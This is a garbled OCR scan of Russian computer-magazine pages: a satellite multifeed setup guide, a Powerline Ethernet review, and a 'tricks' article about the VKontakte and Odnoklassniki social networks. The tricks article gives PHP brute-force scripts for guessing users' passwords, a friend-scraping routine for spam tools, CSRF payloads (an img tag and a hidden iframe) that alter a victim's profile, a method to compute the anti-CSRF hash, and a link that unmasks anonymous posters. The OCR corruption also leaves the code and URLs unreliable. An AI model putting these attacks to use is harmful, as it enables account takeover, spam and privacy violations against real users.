емник и телевизор (ну, или компьютер и монитор) к месту установки. Иначе 
тебе потребуется помощнике рацией или телефоном, который будет конт- 
ролировать уровень сигнала и сообщать о нем. При настройке спутникового 
телевидения на компьютере можно воспользоваться программой РазІЗаі 
Ріпбег, которая умеет голосом зачитыватьуровень сигнала (необходимо 
только удлинить провод динамика и вытащить его с собой на крышу). 

Лучше, еслиутебя будут параметры заведомо рабочего транспондера со 
спутника, который ты настраиваешь. Найти параметры транспондеров 
можно на сайте 'ллотѵ.ІѵпаваЕсогп . Итак, собираем схему, включаем все, 
выставляем рабочие параметры транспондера и, включив приемнике ре- 
жим контроля сигнала, начинаем медленно поворачиватьантенну. Здесь 
нужно учитывать, что приемнику нужно некоторое время, чтобы залочить 
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Устройство мультифида 1 



Угол наклона антенны у нас есть, теперь его нужно правильно выставить. 
'Для этого нужно измерить большой диаметр антенны и умножить это ■* 
Значение на синусугла наклона, тем самым получив длину одного из к* 
катетов прямоугольного треугольника, гипотенузой которого является' . 
"отрезок, лежащий на плоскости антенны и равный подлине большому 
і диаметру антенны. Вешаем антенну на опору и выставляем угол наклона 
[как показано на рисунке- _А | Дг ,1 



Делаем крепление для второго конвертера с помощью сантехнического 
[хомута и шпильки^Хі — 



сигнал, поэтому торопиться не следует. Чаще всего приемник индицирует 
две шкалы: сигнал и качество. Большее внимание нужноуделять шкале 
«качество», — именно она отображаетуровень полезного сигнала. 

Когда ты повернешь антенну в нужном направлении и появится уровень 
по шкале «качество», нужно будетточно отстроить антенну и затянуть 
крепежные гайки. Контролировать точность настройки можно, если 
отклонять антенну, слегка потянув за ее край. Сигнал должен уменьшать- 
ся при отклонении во всех направлениях (вверх, вниз, влево и вправо]. 
Только после этого можно считать, что антенна настроена точно. 

Если ты настраиваешь антенну на спутник с линейной поляризацией, то 
нужно еще подкорректировать положение конвертера — плавно вращая 
его, добиться наибольшего показания шкалы «качество». 

Освоив настройкуантенны на основной спутник, ты без труда настро- 
ишь мультифид. Нужно закрепить второй конвертер в расчетнуюточку 
и попробовать принять сигнал. С вероятностью 60% сигнал будетсразу. 
Подстрой положение конвертера по максимуму уровня, перемещая 
понемногу вверх, вниз, влево, вправо — и затяни крепления. Не забудь 
подстроить конвертер по максимуму сигнал а, вращая его вокруг оси, так 
же, как при настройке на основной спутник. 

Н ПОДВОДНЫЕ КАМНИ И КАК ИХ ОБОЙТИ 

А сейчас я постараюсь оградить тебя от неприятностей, которые могут 
возникнуть по причине неправильного выбора оборудования, установки 
или настройки. 

1. Антенну для установки с мул ьтифидом лучше выбирать офсетную 
длиннофокусную. Прямофокусная антенна, чаще всего, короткофокусная 
и конструктивно неудобна для монтажа мультифида. На длиннофокусной 
антенне мультифид работаетэффективней. 

2. При выборе переключателя БіБЕрС нужно поинтересоваться у 
продавца, насколько стабильно модель работаете вашим приемником. 
Достаточно часто наблюдается нестабильная работа или даже несовмес- 



тимость приемника с переключателем. Брать лучше сразу переключатель 
на четыре входа — стоят они та к же, каки на два входа, но будет за пас на 
расширение. 

3. Если ты устанавливаешь мультифид в связке с мотором, включай переклю- 
чатель по схеме: конвертеры — переключатель — мотор — приемник. Если 
ты включишь переключатель до мотора, то ток питания мотора пойдет через 
переключатель, а он на такие нагрузки не рассчитан и может выйти из строя. 

4. Когда изготавливаешь кронштейн мультифида, желательно его сделать 
длиннее, чем нужно по расчетам. Во-первых, тебе нужен запас для регу- 
лировки. Во-вторых, не исключено, что в будущем захочется перенастро- 
ить мультифид на другой спутник. Также никто не запрещает поста вить 
третий конвертер, еще на один спутник, тогда запас и пригодится. Нужно 
всего л ишь приобрести еще один сантехнический хомут и прикрутить его 
в нужном месте — на те же шпильки. 

5. При подключении переключателя на первый вход включай основной 
конвертер. Даже если переключатель выйдет из строя, первый вход 
останется в работе. 

6. Закрепи около антенны половинку пластиковой бутылки (дном вверх] 
и помести в нее подключенный переключатель. Это самый надежный 
способ уберечь переключатель от попадания влаги. 

7. Если антенна устанавливается в труднодоступном месте, то не поле- 
нись и настрой мультифид на земле, закрепив антенну на подходящую 
стойку. Установив антенну на штатное место, тебе останется только под- 
корректировать при необходимости угол места на антенне и положение 
мультифида (вверх-вниз]. Корректировки, скорее всего, не избежать, 
потому что стойки могут и меть разный угол наклона, но эта процедура 
существен но упростит настройку. 

8. Перед началом установки и настройки постарайся уточнитьузнакомых, 
кто при ни мает нужный спутники какой транспондер самый сильный, — он 
понадобится для первоначального наведения антенны. Ата кже пригодит- 
ся самый слабый: по нему удобно будетточно отъюстировать антенну. ЗС 
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• Безопасность 

САМЫЕ СОВРЕМЕННЫЕ СПОСОБЫ ЗАЩИТЫ 



А51І5 ТгепсІ СІиЬ - это клуб для тех, кто всегда хочет быть в курсе актуальных 
тенденций мира современных технологий. Наши эксперты выбрали 5 основных 
направлений, в которых будет вести работу Тгепб СІиЬ - развлечения, новинки, 
безопасность, железо и бизнес. Ежемесячно вы будете получать самую свежую 
инсрормацию по каждому направлению из журналов* и погружаться в интерак- 
тивный мир клуба на сайте ѵѵѵѵѵѵ.АБУЗТС.ги. 



Железо 



ВСЕ САМОЕ ИНТЕРЕСНОЕ ИЗ МИРА КОМПЬЮТЕРНОГО ЖЕЛЕЗА 




Новинки 



ОБО ВСЕМ НОВОМ И УНИКАЛЬНОМ, ЧТО ЖДЕТ НАС В БУДУЩЕМ 



Бизнес 



ПОСЛЕДНИЕ ТЕХНОЛОГИИ И ТРЕНДЫ УСПЕШНОГО БИЗНЕСА 



Развлечения 



ВСЕ, ЧТО НУЖНО ДЛЯ СОВРЕМЕННОГО ОТДЫХА 



- журналы-участники проекта: «Страна Игр», «МАХІ іипіпд», «Свой Бизнес», «Железо», «Хакер», «Мобильные Компьютеры» 
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А $11$ Р1 

Защищенный ЕІЬегпеІ 
по обычной электропроводке 

Автор: Степан Ильин 

В стремлении избавиться от проводов мы испробовали многое. 
Очевидным решением кажется использование сетей ѴѴі-Гі (осо- 
бенно с учетом появления высокоскоростного 802.11л). Но вот 
незадача: и беспроводная сеть не решает проблему полно- 
стью! Три-четыре стены - и никакой сигнал от точки доступа 
уже «не пробьет». Не начинать же сразу тянуть витую пару, 




тщательно маскируя провода под плинтусом? На самом деле, 
провода, которые понадобятся в твоей квартире - это обычная 
электрическая проводка. Не нужно прокладывать «витуху» 
в каждую комнату - всю черную работу давно выполнили за 
тебя строители. А производители сетевого оборудования сде- 
лали возможным это использовать. 



Как это работает? 

Технология Роѵѵегііпе появилась еще десятилетия назад. Тогда низ- 
коскоростные (скорость иногда ниже, чем 0,01 Кбит/с) технологии 
стали использовать в энергетике на высоковольтных магистралях 
- для передачи технической инсрормации, например, о напряжении 
на подстанциях. Похожие принципы используются производите- 
лями для работы над технологией РІ_С (Роѵѵег І_іпе Соттипісабоп), 
позволяющей передавать данные на скоростях в десятки Мбит/с. И 
компания А51І5 - тут, естественно, не исключение. 

Отправить данные по обычной проводке, где под высоким 
напряжением передается электроэнергия, - задача уже 
сама по себе непростая, а с учетом российских реалий 
усложняется вдвойне. Сплошь и рядом - ветхие провода, 
проложенные в прошлом веке, куча изгибов и поврежде- 
ний, наспех сделанные «скрутки» и прочие ужасы. В итоге 
получаем разделяемую среду (одна на всех) и море помех, 
с которыми нужно как-то бороться. Ничего не напомина- 
ет? Условия очень похожи на радио-эсрир, поэтому здесь 
используются практически те же самые алгоритмы моду- 
ляции и принципы передачи сигнала. Занимается модупя- 
цией/демодупяцией специальный РЮ-модем - именно он 
вставляется в розетку, а от него к компьютеру идет самый 
обыкновенный патчкорд (хотя существуют версии 115В, но 
это редкость). Для передачи применяют диапазон несущих 
частот от 1,6 до 30 МГ ц. Канал передачи данных образуется 
84-мя поднесущими частотами. Используется полудуплек- 
сный режим передачи (то есть - только либо прием, либо 
передача). Поскольку электрическая сеть единственная, 
и в ней одновременно может находиться несколько пере- 
дающих адаптеров, - имеет место разделение физической 
среды. Для организации доступа к среде применяется про- 
токол С5МА/СА (Саггіег зепзе тиКірІе ассе$$ ѵѵіДі соііізіоп 
аѵоібалсе). В отличие от классического для ЕІЬеглеІ-сетей 
метода С5МА/С0 (соііізіоп беіесііоп) здесь каждый раз 
после передачи кадра станция ждет подтверждения приема. 
Если подтверждение не получено, считается, что произошла 
коллизия, и через случайный промежуток времени передача 
повторяется. 



Что нужно? 

Давай разберемся, что нам понадобится, чтобы организовать 
локальную сеть посредством обычной электрической проводки? 
Вся прелесть в том, что тебе необходимо приобрести лишь два 
Роѵѵегііпе-адаптера. А51І5 РІ_-Х31 - недорогой и вполне доступ- 
ный вариант (только-только появившийся в продаже). Адаптер 
построен с применением стандарта НотеРІид АѴ, который ис- 
пользуют и другие вендоры, и подразумевает передачу данных 
на скорости до 200 Мбит/с (в идеальных условиях, что практи- 
чески нереально) и поддержку шифрования. 

Характеристики продукта 

• Порты: 1 х АС 200 Мбит/о РІ_С + 1 х 10/100 ЕІЬегпеІ 

• Напряжение питания: 100-240 В при 50-60 Гц 

• Размеры: 112 х 80 х 27,2 мм 

• Шифрование данных: 128-бит АЕ5 

• Максимальное удаление: 300 м 

• Поддержка Оиаіііу о( Зегѵісе (Оо5) 

• Совместимые ОС: ѴѴІпсІоѵѵз 98, 2000, ХР, Ѵівіа 

У меня дома стоит маршрутизатор, который автоматически 
выдает ІР-адреса (установлен ОНСР-сервер) и одновременно 
является шлюзом в инет. Не зная о принципе работы девайсов, 
я думал, что придется долго с ними колдовать, править таблицу 
маршрутизации и всячески заморачиваться, чтобы подключить к 
роутеру еще один компьютер в удаленной комнате, куда не был 
протянут сетевой кабель. Но все оказалось просто, как дважды 
два. Один из адаптеров РІ_-Х31 я воткнул в розетку рядом с мар- 
шрутизатором и соединил их патчкордом, а другой - подключил 
к компьютеру в удаленной комнате, где как раз была свободная 
розетка. Каково же было мое удивление, когда сетевой адаптер 
на компьютере тут же получил ІР-шник от моего маршрутизато- 
ра и подключился к инету. Настройка вообще не нужна! После 
проверки АРР-таблиц стало ясно, что сетевые адаптеры даже 
не подозревают о наличии каких-то промежуточных устройств 
- два роѵѵегііпе-адаптера в самом простом случае выступают 
просто, как «умный» кусок сетевого кабеля, передавая пакеты 
по обычной проводке. Замечу, что любая передача осуществпя- 
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ется исключительно в зашифрованном виде. 

Для работы нескольких девайсов иногда может понадобиться их 
немного отконфигурировать. Делается это с помощью специ- 
альной утилиты - А51І5 РІ_-Х31. В окне программы отображаются 
устройства (а точнее, их МАС-адреса), подключенные непос- 
редственно к компьютеру, а также найденные через электричес- 
кую сеть. Программа периодически отправляет в сеть пакеты 
с запросом, поэтому список доступных девайсов с указанием 
уровня приема и возможной скорости передачи данных посто- 
янно обновляется. Если есть необходимость сделать приватную 
сеть, - с помощью специальной вкладки можно заставить девайс 
работать только с определенными адаптерами. 

Тебе интересно, насколько хорошо это работает? В рамках квартиры 
- очень хорошо! Для тестирования проводного сегмента я заюзап 
программу ЫеТО СЬагіоІ и скрипт ТЬгоидЬриІ с передачей пакетов 
максимального размера. На двух станциях устанавливались так назы- 
ваемые епфоіпі-программы, затем в консоли №Ш СЬагіоі запускался 
скрипт генерации трафика. Конечно, заявленные стандартом 200 
МБит/с добиться ни удалось, но 40 Мбит/с - вполне реальная цифра, 
без задержек и потерь пакетов. В любой точке квартиры и практически 
с любых розеток скорость оставалась почти неизменной. Надо сказать, 
что в моем доме установлено оборудование для подключения к 
интернету из розетки. И я не исключаю, что это может серьезно влиять 
на скорость работы устройств А51І5. В любом случае, даже 40 Мбит/с 
достаточно для просмотра видео в реальном времени. К сожалению, 
эксперимент с подключением к адаптеру, установленному в другом 
подъезде, провалился - устройства друг друга уже не видели. 

А как же безопасность? 

Я уже говорил: производителем заявлена поддержка шифро- 
вания с помощью 128-битного алгоритма АЕ5. Однако не стоит 
забывать, что для передачи данных используется общая среда, 




а поэтому к вопросу безопасности 
нужно подойти особенно ответс- 
твенно. Лучше всего, помимо ап- 
паратного шифрования, восполь- 
зоваться еще и ѴРІМ-соединением. 
И, чтобы не морочить себе голову, 
я бы рекомендовал два полезных 
инструмента: 

РетоЬо 0.13 

ѵѵѵѵѵѵ.гетоЬо.сот 

Статус: Ггееѵѵаге 
Это относительно новая утилита, 
аналогичная нашумевшей и много 
раз нами расхваленной програм- 
ме НатасЬІ, которая позволяет 
установить ѴРГІ-соединение двумя 
кликами мыши без какой-либо 
изнурительной настройки и гемор- 
роя. В случае с РетоЬо частная сеть называется Іпзіапі РгіѵаЬе 
Меіѵѵогк (ІРІМ) - создатели акцентируют внимание на мгновеннос- 
ти подключения (іпзЬапІ:). И действительно: требуется лишь за- 
пустить на каждом из компьютеров клиентскую часть и добавить 
нужных пользователей в контакт-лист. В итоге мы обретаем все 
прелести ѴРЛ: 

• удаленный доступ к домашнему компьютеру и его файлам; 

• безопасный шаринг файлов; 

• упрощение процедуры видеоконференций, и сетевой игры в 
разных играх. 

Весь трафик шифруется с помощью 256-битного АЕ$ алгоритма. 

СЬгМде 1.0 

ѵѵѵѵѵѵ.оЬгіфе.сот 

Статус: Ггееѵѵаге 

Безопасная синхронизация директорий, шаринг файлов, бэкап, 
а также удаленный рабочий стоп через ѴРІ\І, основанный на ис- 
пользовании возможностей Соодіе Таік. Что особенно приятно, 
система работает даже в том случае, если ты находишься за 
файрволом или МАТ'ом. 

Любые данные передаются в криптованном виде (АЕ5 128-бит), 
а авторизация осуществляется с помощью сессионных ключей 
(8НА1 НМАС). 




4 






рс_гопе 






АНДРЕИ КОМАРОВ 

/ КОМАПОѴ@САМЕІ.АЫО.Я1І / 




Фокусы 
в социальных 
сетях | 





Где бы ты ни смотрел в монитор, будь то веб-зона гостиницы, аудитория 



іудиторю 

1 _ 

в университете, обычный офис или просто дома у соседа, ты практическ и | 

везде увидишь до боли знакомые интерфейсы «Вконтакте» и «Одноклассни- 
ков». Люди подсели — и подсели серьезно. Обн овить пр оф иль и выложить 
фотки сможет даже твоя баб 
лишь избранным. Итак, вникай. 

ЕЕШВ 

ПОДБИРАЕМ ПАРОЛЬ ПОЛЬЗОВАТЕЛЯ ѴКОМТАКТЕ.КЦ 

Если раньше самым частым вопросом было «Как взломать почтовый ящик», 
то теперь новый тренд — каждый считает своим долгом подобрать пароль на 
профиль своей подруги/девушки/соседа (нужное подчеркнуть). А поскольку 
большинство пользователей социальных сетей знакомы с компьютерами 
лишь издалека, то и не особо заморачиваются, выставляя пароль. «1234» 
или свое имя — это вполне стандартная ситуация. Что ж тут удивляться, 
что подобрать (тьфу, конечно же, восстановить забытый) пароль во многих 
случаях оказывается не просто, а очень просто. И быстро. Собственно, не 
нужно даже каких-то специальныхутилит. Вполне достаточно простенького 
РНР-скрипта. 

Начинаем сустановки параметров брутфорса: 

$ешаі! = ' Ъі11удаСез@тісгозобС.сот' ; 



ГипсСіоп ЪгиСе ( $етаі1 , $разз ) { 

$Гр=Гзоскореп( "ѵкопбакбе.ги" , 80 , $еггпо, $еггзбг, 10) ; 
$оиС = "СЕТ /1одіп.р1ір?етаі1= " . $етаі1 . "&разз=" . $разз . 
" НТТР/1 . 0\г\п" ; 

$оиС . = "Нозб: ѵкопСакке . ги\г\п" ; 

$оиб . = "Юзег-АдепС: $изег_адеп1:\г\п" ; 

$оиС . = "Соокіе: іпсоше=1\г\п" ; 

$оиС . = "СопСепС-Туре : СехС/хшІ ; скагзеб=м1пс1омз-1251\ 
г\п\г\п" ; 

Гмгібе ( $Гр, $оиб) ; 

$апз = ' ' ; 

ѵгііііе ( ! Геоб ( $Гр) ) 



{ 



$апз . =ГдеСз ($Гр, 12 Е 



# Мыло для брута 
$раззм = '1234567'; 

# Пасс для брута 

$бісб = (ібііе ( "бісСіопагу . ЬхС " ) ; 

# Файл со словарем паролей или мыл 
$Суре= 2; 

# Тип атаки 1 — на одно мыло по словарю паролей , 2 — на 
один пароль по словарю мыл 

$гези1С = "раззжэгсі. СхС " ; 

# Файл с найденным паролем 

$изег_адепб = "Орега/9.50 (Міпс1оѵ73 ЫТ 6.0; II; ги) " ; 

# ІІзег-адепІ: 



} 

Гсіозе ( $Гр) ; 

іб (ргед_табс1і ( " /\Ь302 Роипсі\Ь/із " , $апз) ) 
гебигп Сгие; 
еізе гебигп Гаізе; 

} 

Если идет подбор по словарю, эту функцию нужно вызвать столько раз, 
сколько возможных вариантов в словаре с пассами. Или для каждого 
етаіГа из базы, если речь о попытке войти с распространенным паролем 
(например, 1 23456). В целях экономии, этот простой кодя не привожу, но 
полную версию скрипта ты можешь найти в приложении на диске. 



Далее пишем простую функцию для осуществления попытки входа. 
Скриптоснован на нехитром способе авторизации — с помощью 
отправки ВЕТ-запроса по ссылке вида: ѵкопкаксе . ги/1одіп. 
рЬр ? ешаі 1 =ХХХ&раз з =ХХХ. 



Щ ТРИК2: 

ПОДБИРАЕМ ПАРОЛЬ ПОЛЬЗОВАТЕЛЯ НА «ОДНОКЛАССНИКАХ» 

Если немного покорпеть, то не составиттруда написать подобный брутфо- 
рус и для другого, не менее популярного, сервиса — обпокіагвпікі.ги . 
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Зкладка «Друзья», фильтр друзей — вставим <ітаде згс=" " 
опеггог=а1егр ( ’иовд! ' ) . Каквидишь, появилосьуведомление, стал 
быть, наш 35-код выполнился. Попробуем изучить перехваченный кук, 
который устанавливается сервисом (аіегр (йосшпепр . соокіе) ■ 



:тало 

УК, 



Однако используемый в нем подходдля авторизации силь- 
но отличается. Вместо ОЕТ, используются Р05Т-запросы 
вида: 

$с!ака = " зк .розкесі=зек&зк . етаі1=$асс&зк . 
раззж>гс1=$разз&:Ьиккоп_до=%В0%92%В0%ВЕ%В0%В9% 
В1%82%В0%В8" ; 

$ге = " РОЗТ кккр : / /Ѵ7І7 . осіпокіаззпікі . 
ги/ссЗк/зк . стс1/1одіп/ккп/5 622 НТТР/1 . 1\ 
пНозк : ѵ?17 . осіпокіаззпікі . ги\п" . "ІІзег- 
Адепк : МогіІІа/4.0 (сотракіЫе; МЗІЕ 7 . ОЫ ; 
Міпйстз ЫТ 5.1; ЗѴ1 ; .ЫЕТ СЬК 1 . 1 . 4322 ; 

М3 ІйепкіЗегѵ 1 . 4 . 12 ) \пКеер-АІіѵе : 3 0 0 \ 
п" . "Соппескіоп: кеер-аііѵе\пРе1егег : 
кккр : / /ѵ?17 . осіпокіаззпікі . ги\п" . "Сопкепк- 
Туре : арріісакіоп/х-мѵтм-когт-игіепсосіесіх 
п" . "Сопкепк-Ьепдкк : $1еп\п\п$сіака " ; 



этого в адресной строке набираем аЬоиксопГд, после чего 
с помощью поля Шег вводим названия нужного парамет- 
ра - пеіѵѵогк.ьир.гесіігесііоп-іітіі . Теперь вместо внуши- 
тельного списка всевозможных настроек мы видим только 
то, что нужно. Нехитрым образом меняем его значение на 
О (тем самым запрещая обрабатывать переадресации). 
Открываем новую вкладку (<СігІ+Т>), грузим страницу 
входа Шр://ѵкопІакІе.ги/Іодіп.рЬр и логинимся. Вылезет 
ошибка, нотак и должно быть. Далее — переходим на 
какую-нить другую страницу, например — Ыір://ѵкопІакіе. 
гиДгіепб.рбр . После этого необходимо вновь открыть 
вкладку с настройками и изменить значение параметра 
пеІѵѵогк.Шр.гебігесбоп-ІітіІ: на дефолтное (обычно — 20). 
Готово! Теперьты в инвизе для своих друзей, однако тебе 
придется тщательно обходить стороной ссылки, содержа- 
щие в адресе «ргоіііе .рЬр». 




> ѵѵагпіпд 

Полученные знания 
используй сумом 
и очень осторожно. 

В случае их приме- 
нения в незаконных 
целях мы ответствен- 
ности не несем! 



ТРИК4: 



ИМПОРТИРУЕМ ДНИ РОЖДЕНИЯ ИЗ ѴКОЫТАКТЕ 



Запрос осуществляется на 80 порт, но есть один важный 
нюанс. Дело в том, что обпокіавзпікі.ги специальным 
образом распределяютзапросы, балансируя нагрузку. 
Видишь адрес иі 7 . осіпокіаззпікі . ги? Так вот, в 
данном случае запрос уходит на некоторый ѵѵ17-сервер. 
В общем виде параметр иХХ (где хх — некоторые цифры) 
часто обновляется: осуществляя множество попыток 
авторизации, необходимо отнестись кэтому крайне 
внимательно. 



ІТРИК 3: 



НЕВИДИМОСТЬ ПРИ СЕРФИНГЕ УКОЩАКТЕ.ІШ 

Просмотрев страницу пользователя в «Одноклассниках», 
ты обязательно оставляешь след — владелец профиля 
узнает, кто и когда им интересовался. Отличный способ 
монетизации: не хочешь палиться — плати денежку. 
«Вконтакте» такую систему не практикует, поэтому про- 
сматривать страницы друзей и подружек можно, сколько 
влезет, не опасаясь за свое инкогнито. Другое дело, что 
иногда хочется заходить на сайт незаметно: так, что- 
бы другие не заметили твоего появления (а это выдает 
окно «Друзья онлайн» и информация отвоем профиле). 
Впрочем, остаться невидимым можно. Для осуществления 
нехитрой операции необходимо поправить специальный 
параметр в браузере, который отвечаетза количество 
одновременных соединений для указа иного узла. Проще 
всего это сделать в МогШа РігеГох, воспользовавшись 
служебной страницей для тонкой настройки браузера. Для 



За что я люблю «Конта кт», та к это за базу дней рождений 
большинства своих знакомых. Уверен, что и у тебя друзья 
вполне прогрессивные и, если даже не пользуются серви- 
сом, то, по меньшей мере, завели в нем аккаунт, указав свой 
день рождения. Ежедневно заходить на этотресурс, чтобы 
прочекать радостные события, у меня нет возможности, 
поэтому очень хорошо было бы их оттуда экспортировать. 
Наш читатель — Мігатоѵ <пігатоѵйіпЬох.ги> — написал 
специальный скрипт, позволяющий быстро и без проблем 
выполнить подобную операцию. Скачать его можно по адре- 
су : ЫідУ/шбпсщхзІехнші/р/дат^^ 

Ітипк/ѵк саіепсіаг Ьа( ісв.рі . 

В скрипте требуется указать только мыло и пасс. По завер- 
шении события сохраняются в файл ісв, который лично я им- 
портировал в ТЬипсІегЬігсГа с плагином ІідЫпіпд. Выглядит 
это примерно следующим образом: 

ФОРМАТ ВЫХОДНОГО ФАЙЛА 

ВЕНта : ѴСАЬЕШАВ 
ѴЕК8ІОЫ : 2 . О 

РКОБІБ : - / /Могіііа . огд/КШЗеМВ Моиіііа 

Саіепйаг VI . 1//ЕИ 

ВЕ6Ш:ѴЕѴЕШ’ 

8ЦММАКУ : ФИО 

КНЦЬЕ : ЕВЕО=УЕАКЬУ ; ШТЕВѴАЬ=1 
БТ8ТАНТ ; ѴАШЕ=ПАТЕ : 20080101 
БТЕШ ; ѴАЬиЕ-БАТЕ :20080102 
САТЕСОВІЕ8 : Дни рождения 
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Скрипт для подбора пароля «В Конта кте.ру» 




ШЬ:Ы:1:р: / /ѵкопДакЬе . ги/ісі*** 

БЕ5СР.ІРТКЖ : Дата Рождения: 01 . 01 . 198б\пФото : 
Ъ.ББр ://*** . ѵкопкакЪе . ги/**** /**** . зрд 
ЕЫБ : ѴЕѴЕЫТ 
ЕЫБ : ѴСАБЕББАК 



ТРИК5 



КАК ДЕЛАЮТ СЕТЕВОЙ БИЗНЕС НА СОЦИАЛЬНЫХ СЕТЯХ 

Хакеры научилисьзарабатывать на самых различныхтемах, втом числе и с 
помощью социалок. Прежде всего, это спам адвердами, воровство аккаунтов 
за деньги, массовая регистрация. Отдача от первого — большая, хотя скудеет 
с каждым днем, потому что людей, осознавших тему, становится все больше. 

В качестве программных комплексов для спама самыми популярными 
стали ѴкопІакІеМеззедегЬуРХ и один из альтернативных спаммеров 
— ОвраттегЬуСбаак. А вообще, та кихтулз огромное количество и многим 
самим под силу реализовать подобный инструмент. Попробуем? 

Сейчас на паре примеров мы модулями накидаем софти ну, которая очень 
сильно должна помочь в нашей опасной работе. Она должна уметь работать с 
группами; грабить друзей пользователя с зада иным Ю; грабить пользователей 
группы и рассылать сообщения. Делается это для того, чтобы производить кон- 
текстную рассылку, опираясь на группы. Полный скрипт мы выкладывать не 
будем, но приведем ключевые моменты. Получитьсписокфрендов можнотак: 



ЕипсЕіоп ОеСЕгЫзегз ( $соокіе , $ѵкзезз , $зб) { 

ІЕ ($зб--0) 

$игі = 

"ЬЕЕр: / /ѵкопЕакЕе.ги/ Егіеп<3.рЬр?$ѵкзезз&зЕ=$зЕ" ; 

еізе 

$игі = "ЬЕЕр : //ѵкопЕакЬе . ги/Егіеп<3.рЬр?$ѵкзезз " ; 
$сЬ = сиг1_іпіб ( ) ; 

сиг1_зеЕорЕ ( $сЬ, СШШРТМЖЬ, $игі) ; 
сиг1_зеЕорЕ ($сЬ, СШШРТ_СООКІЕ , $соокіе) ; 
зеЕРгоху ( $сЬ) ; 

сиг1_зеЕорЬ ( $сЬ , СЦКШРТ_ЕЕРЕКЕК , ' ЬЕЕр : / /ѵкопЕакЕе .га/') 
сиг1_зеЕорЕ ($сЬ, СШШРТЬКЕТЕІШТКІЩЗРЕЕ , 1); 
сиг1_зеЕорЕ ($сЬ, СШШРТ_РОЬЕОИШСАТІОКІ, 1); 
сиг1_зеЕорЕ ($сЬ, СЕЕЬ0РТ_ТШЕ0ит, 120); 

$гези1Е = сиг1_ехес ( $сЬ) ; 
сиг1_с1озе ( $сЬ.) ; 

ргед_таЕсЬ_а11 ("#<а 1ігеЕ=\ "таіі ,рЬр\ 

?асЕ=игіЕе&Ео= ( . *? ) \ " ># " , $гези1Е, $т) ; 

есЬо "Му Егіепсіз \п" ; 

Еог ( $і=0 ; $і<соипЕ ( $т [1] ) ; $і++) { 
есЬо "ЫзегІБ - " . $т [1 ) [ $ і ] . " \п" ; 

} 



Все остальные части скрипта, а именно поиск пользователей по группам и 
функция для отправки сообщений в полном виде выложены на нашем 0\ЛЭ. 




ТРИК6 



НЕМНОГО О ПРОВЕДЕНИИ С5КР-АТАК 

С помощью специально сформированной страницы и кода на ней злоумыш- 
ленники научились отправлять пользователя на доверенный сайт, где этот 
код исполнитза него какие-либо действия. Подобные атаки называются 
Сго55-5ІІегедие5І Гогдегу (С5Р?Р) и особенно характерны для социальных 
сетей из-за недостаточной проверки подлинности НТТР-запросов. Нетак 
давновлентахбагтракбыл пост об обнаружении такого бага на сервисе 
ѵкоп{ак{е.гц .Ты впариваешь этотлинк или исполняешь средствами и у 

пользователя в профиле поле «Сайт» меняется на указанный: 

ЬЕЕр : //ѵкопЕакЕе . ги/ргоЕіІеЕйіЕ .рЪр?раде=сопЕасЕз&зиЬт 
=1&«еЬзіЕе=ЬЕЕр : / / зіЕе . сот 

Или другой пример. При переходе на сайт, указанный в качестве веб- 
страницы дорогого друга-пользователя, твой браузер исполняет скрипт 

<зсгірЕ> 

ЕипсЕіоп ЙоіС ( ) { 
ѵаг ЕЕгпІ ; 

ЬЕтІ = '<ітд згс=ЬЕЕр ; //ѵкопЕакЕе . ги/ргоЕіІеЕсІіС .рЬр?р 
аде=сопЕасЕз&зиЬт=1&иеЬзіЕе=1іЕЕр: / /зІоузіЕе . сот> ' ; 

тпскж . Егатез [ " Егт" ] . йоситепЕ . Ъосіу . іппегНТМЬ - ЦЕтІ; } 
</зсгірЕ> 

<іЕгате пате-"Егт» оп1оай-"йоіЕ { ) " ѵгійЕЕі- " 0 " 

Ееі дГіЕ- " 0 "></іЕгате> 

Как видно, запрашивается картинка с адресом ѵкопЕакЕе.ги/ 
ргоЕіІеЕйіЕ .рЬ.р?раде=сопЕасЕз&зиЬт=1&иеЬзіЕе=Ь.ЕЕр: // 
хІоузіЕе . сот 1 Браузер выполняетзапрос поэтому ІІПБ, и на анкете в 
ѵкопіакіетвое поле «Веб-сайт» станет равным зіоувііе.сот. Теперь, если 
кто-нибудь увидит адрес в твоем профиле и также перейдет по нему, то... 
изменит себе профайл ит.д., ит. п.Хотя в настоящий момент подобная 
штука не пройдет. По крайней мере, так просто: разработчики включили в 
передачу запроса дополнительный параметр НА8Н, который фигурируете 
каждом запросе при изменении персональных данных. 

Получается линкследующего вида: 

ітд згс=ЪЕСр : / /ѵкопЕакЕе . ги/ргоЕіІеЕйіЕ .рЕір?раде=сопЕа 
сЕз&1іаз1і=(іаз<і23&зиЬт=1&иеЬзіЕе=1іЕЕр ; / /г ІоузіЕе . сот> ' ; 

Хэш требуется узнать предварительно, — и можно делать та кие фокусы. 

А как его узнать? Раньше это был тсІ5 от(ісІ+таіІ), но сейчас значение 
урезано до 6 байт. Соответственно, нужно знать мыложертвы, итогда 
получаем следующий нехитрый алгоритм: 

Щты знаешь Ш; 

^знаешь мыло; 

^ вычисляешь тсІ5 и урезаешь хэш-сумму до 6 элементов; 

Щ подставляешь в запрос и выполняешь. 
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ТРИК8: 




г»-«в (Ія чи- ии-*М«1-#**4 іі* 



■ ШіЫ 1 



■-■і рзн-михши і. п 



- 

'' 



ІІаШі' "Ті ГьК “I 



Восстановление пароля из кукисов 



ТРИК7: 



КАКУЗНАТЬ, КТО ОСТАВИЛ МНЕНИЕ 

«Вконтакте» довольно популярна система «Мнения», позволяющая 
анонимно оставлять сообщения. И каждый пользователь может 
отправить ответ на мессагу, не зная, кому ее отправляет. Узнать, кто 
же оставил о тебе лестный или, наоборот, не очень приятный отзыв, 
очень просто. Необходимо вставить в ответное сообщение ЫсЬр : / / 
ѵкопбакбе . ги/табсЪез . рЪр?асб=а_зепб&Ео_ій= [Твой 
Ю] &йес=1. Теперь человек, переходя по ссылке, автоматически 
отвечает на твое предложение! 



УЛУЧШАЕМ ИНТЕРФЕЙС С ПОМОЩЬЮ 0КЕА5ЕМ0ЫКЕѴ 

Существует много скриптов бгеаветопкеу, позволяющих обновить 
интерфейс социальных сетей. В частности, ѵкРаІсб — небольшой скрипт 
для СгеазеМопкеу под сайт «Вконтакте». С крипт добавляет ссылки 
на Стену, Мнения, Фотографии, Видео ит.д. рядом с пользователями, 
страничка которых удалена или открыта только для друзей. Если пользо- 
ватель не является твоим другом, то, возможно, будут недоступны неко- 
торые ссылки, однако, скорее всего,™ сможешь посмотреть фотоальбом 
этого человека или послушать его музыку. Ссылки на разделы появля- 
ются рядом с человеком в результатах поиска.то есть на ЬНрУ/ѵкопіакіе. 
ги/зеагсЬ.р[ір?іб=1 . где после ій= идет ій человека. Эта страничка 
